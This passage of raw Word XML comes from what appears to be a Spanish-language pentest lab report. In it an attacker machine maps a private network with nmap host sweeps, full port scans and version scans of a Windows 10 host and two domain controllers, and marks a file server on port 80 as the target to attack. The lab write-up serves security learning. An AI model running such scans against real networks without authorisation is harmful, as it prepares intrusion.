                                <w:p w14:paraId="02081853" w14:textId="54B0AC5A" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                                  <w:r>
                                    <w:t>-v activa el primer nivel de verbosidad hay hasta 3.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1EEFFA85" w14:textId="58F5753B" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                                  <w:r>
                                    <w:t>192.168.1.0/24 es la red que voy escanear.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="59F81EC3" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE189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4C18D9" id="Cuadro de texto 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517237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3E3F9398" w14:textId="78F56B8D" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                            <w:r w:rsidRPr="00BE1898">
                              <w:t>nmap -T</w:t>
                            </w:r>
                            <w:r>
                              <w:t>5</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BE1898">
                              <w:t xml:space="preserve">  -v </w:t>
                            </w:r>
                            <w:r w:rsidR="0033590D">
                              <w:t xml:space="preserve">-sn </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BE1898">
                              <w:t>192.168.1.0/24</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4D2A3BD4" w14:textId="5DEFFFA5" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                            <w:r>
                              <w:t xml:space="preserve">T5 lo que hace es haga escaneos muy rápidos con los cuales </w:t>
                            </w:r>
                            <w:r w:rsidR="0033590D">
                              <w:t>sería</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> muy fácil que nos detectaran.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="25F3B217" w14:textId="4A7C8A6B" w:rsidR="0033590D" w:rsidRDefault="0033590D">
                            <w:r>
                              <w:t>-sn sería un barrido de host sin escaneo de puertos.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02081853" w14:textId="54B0AC5A" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                            <w:r>
                              <w:t>-v activa el primer nivel de verbosidad hay hasta 3.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1EEFFA85" w14:textId="58F5753B" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                            <w:r>
                              <w:t>192.168.1.0/24 es la red que voy escanear.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59F81EC3" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898"/>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D8CC16" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04F2815F" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C0EAF1F" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7659DFA3" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2950B613" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10CD0B53" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77C2F311" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01DB7829" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41F55DCC" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FAF0E5C" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19F177AB" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="147199A7" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2737E5B2" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EE971D5" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29901F93" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="243DDDD3" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="088314A3" w14:textId="27A9C2FB" w:rsidR="00BE1898" w:rsidRDefault="0023227A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A9D0A8" wp14:editId="2BB67CB9">
                  <wp:extent cx="5400040" cy="2030730"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="625104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04682" name=""/>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5400040" cy="2030730"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="40978CEE" w14:textId="77777777" w:rsidR="0023227A" w:rsidRDefault="0023227A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="405D117E" w14:textId="77777777" w:rsidR="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62D211FE" w14:textId="77777777" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A664712" w14:textId="12EB406C" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando los tres equipos de Windows, y el parrot atacante:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="063BBC66" w14:textId="77777777" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D3B6887" w14:textId="198FD9DA" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA547E7" wp14:editId="65C43C3C">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1812413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13513" name=""/>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170737FD" w14:textId="77777777" w:rsidR="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06C76378" w14:textId="5D086CC8" w:rsidR="00BE1898" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Descubriendo esta topología de red:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2F5BB6" w14:textId="77777777" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07ACAED5" w14:textId="3204ECD1" w:rsidR="00232879" w:rsidRDefault="00232879" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FDD1E4" wp14:editId="0169C1A4">
                  <wp:extent cx="6645910" cy="4286250"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="267652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2548" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId65">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4286250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65770409" w14:textId="0DE337F2" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="006A17E1">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24004CAD" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="682B705D" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5DB0F08F" w14:textId="7809ECFD" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora realizaré con nmap un escaneo de puertos de cada una de las máquinas descubiertas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F449B76" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="623854E7" w14:textId="0A72A05B" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A7E6B38" wp14:editId="0EE42AF9">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:align>center</wp:align>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>182880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="1404620"/>
                      <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="970634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6D9486CF" w14:textId="0D8DA863" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                                  <w:r>
                                    <w:t>nmap -p- -T4 192.168.1.135</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6D498B0E" w14:textId="57E96A72" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                                  <w:r>
                                    <w:t>nmap -p- -T4 192.168.1.80</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="432626BB" w14:textId="17F0BA70" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
                                  <w:r>
                                    <w:t>nmap -p- -T4 192.168.1.79</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="585800DE" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3"/>
                                <w:p w14:paraId="23B58E34" w14:textId="051D4F8F" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                                  <w:r>
                                    <w:t>Con la opción -p- escaneare todos los puertos de cada máqu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7E6B38" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517483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6D9486CF" w14:textId="0D8DA863" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                            <w:r>
                              <w:t>nmap -p- -T4 192.168.1.135</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D498B0E" w14:textId="57E96A72" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                            <w:r>
                              <w:t>nmap -p- -T4 192.168.1.80</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="432626BB" w14:textId="17F0BA70" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
                            <w:r>
                              <w:t>nmap -p- -T4 192.168.1.79</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="585800DE" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3"/>
                          <w:p w14:paraId="23B58E34" w14:textId="051D4F8F" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3">
                            <w:r>
                              <w:t>Con la opción -p- escaneare todos los puertos de cada máquina.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCF775B" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="70378A3B" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3F037C00" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="64B878E9" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6019B18E" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="0261BBDA" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4043FDF6" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRPr="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="13F19824" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1154E4EC" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="063578F5" w14:textId="2050B50D" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Esto obtuve de la máquina Windows 10:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33854F8F" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="594CF56A" w14:textId="0B1C98FB" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63259B8A" wp14:editId="34CCEC7A">
                  <wp:extent cx="6645910" cy="3528695"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="906113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3671" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId66">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="3528695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="364D58BB" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6F25D4B8" w14:textId="31A60188" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Siendo el puerto 80 donde corre el servidor de archivos, que vamos atacar para lograr el acceso a esta máquina.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B7C88A0" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2C6C6065" w14:textId="46BB5B0E" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Esto de la máquina de Windows Server 2019 DC02:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB415B6" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5D0AF6C5" w14:textId="61006BE1" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68378F72" wp14:editId="3686FA28">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="1921273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3525" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67">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76D64248" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="339B072C" w14:textId="1307A205" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t xml:space="preserve">En </w:t>
            </w:r>
            <w:r w:rsidR="006A17E1">
              <w:t>esta m</w:t>
            </w:r>
            <w:r>
              <w:t>áquina no vamos atacar ningún puerto, pero resalto el puerto 80 porque es el servidor web que permite gestionar los certificados del dominio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACC7FB2" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="07711C8E" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3D6C9646" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="352B8FE4" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="0CBEE223" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2597F87C" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5D12B2C0" w14:textId="69EB81AD" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Maquina Windows Server 2019 DC01:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56AECF1F" w14:textId="35AFC755" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337EE205" wp14:editId="25B1A100">
                  <wp:extent cx="6645910" cy="6621145"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
                  <wp:docPr id="1538549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9711" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId68">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6621145"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="076DA33A" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3EBC74E7" w14:textId="4C006B19" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Podemos ver los mismos puertos que en el caso anterior.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045302B4" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="09DCCC45" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="52FFF3A6" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="02FB94DF" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="536A63B9" w14:textId="5A31C347" w:rsidR="00D67ED3" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora usaré este comando para ver las versiones de los servicios que corren en cada puerto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640E9199" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7A7E19EF" w14:textId="423FF440" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251750400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8A0FEC" wp14:editId="0D918DF4">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:align>center</wp:align>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>182880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="1404620"/>
                      <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="2036994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7017F128" w14:textId="740B277D" w:rsidR="00C70B96" w:rsidRDefault="00C70B96">
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t>nmap -sV -p</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t xml:space="preserve">- </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t>192.168.1.135</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3C4E4295" w14:textId="7602DF83" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00C70B96">
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t>nmap -sV -p</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t xml:space="preserve">- </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t>192.168.1.79</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="215D2BF1" w14:textId="49AFEFA4" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00C70B96">
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t>nmap -sV -p</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t xml:space="preserve">- </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00C70B96">
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t>192.168.1.80</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="348DBB11" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96"/>
                                <w:p w14:paraId="75FAEFA0" w14:textId="7A7F070D" w:rsidR="00C70B96" w:rsidRDefault="00C70B96">
                                  <w:r>
                                    <w:t>La opción -sV nos permitirá ver las versiones que corren en cada puer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8A0FEC" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517504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7017F128" w14:textId="740B277D" w:rsidR="00C70B96" w:rsidRDefault="00C70B96">
                            <w:r w:rsidRPr="00C70B96">
                              <w:t>nmap -sV -p</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">- </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00C70B96">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>192.168.1.135</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C4E4295" w14:textId="7602DF83" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00C70B96">
                            <w:r w:rsidRPr="00C70B96">
                              <w:t>nmap -sV -p</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">- </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00C70B96">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>192.168.1.79</w:t>
                            </w:r>
                          </w:p>
